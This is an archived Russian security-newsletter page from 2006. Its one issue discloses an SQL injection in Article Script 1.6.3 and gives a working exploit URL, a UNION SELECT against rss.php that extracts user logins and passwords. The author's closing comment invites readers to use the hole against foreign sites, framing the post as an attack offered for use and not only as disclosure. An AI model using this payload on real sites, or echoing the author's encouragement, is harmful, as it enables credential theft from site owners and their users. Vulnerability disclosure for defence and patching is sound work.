Отправляет email-рассылки с помощью сервиса Sendsay

IT-безопасность в быту и не только

Рассылка закрыта

При закрытии подписчики были переданы в рассылку "Безопасность. Статьи, новости, комментарии" на которую и рекомендуем вам подписаться.

Вы можете найти рассылки сходной тематики в Каталоге рассылок.

  Ноябрь 2006  
 1
 2
 3
 4
 5
 6
06.11.2006
07:05:26
12:05:19
 7
 8
08.11.2006
07:05:18
12:05:31
 9
10
11
12
13
14
15
16
16.11.2006
07:05:29
12:05:35
17
18
19
20
21
22
22.11.2006
07:05:25
14:05:31
23
24
25
26
26.11.2006
07:05:30
12:05:27
27
28
28.11.2006
12:08:18
14:07:10
29
29.11.2006
07:05:20
12:06:19
30
30.11.2006
01:25:15
14:06:07
Автор
Forester

Статистика

1.394 подписчиков
-1 за неделю
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. SQL-уязвимость в Article Script.


Компьютер для продвинутых пользователей
В этом выпуске:
Article Script
ПО: Article Script
Версия: 1.6.3

Уязвимость:
Функция category не проверяет переменные до выполнения, что позволяет на провести SQL-инъекцию и получить данный по пользователям.
Использование:
http://www.victim.com/articles/rss.php?category=-1/**/union/**/select/**/1,2,login,password/**/from/**/users/*
Комментарий:
Поискал данный скрипт в Рунете, но страниц с ним не нашёл. Видимо тем, кто хочет использовать эту, уязвимость придётся трясти буржуев.
Не забудьте проголосовать за выпуск!
Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Меня можно найти: ICQ - 273214003

e-mail - isdmi1::mail.ru
В избранное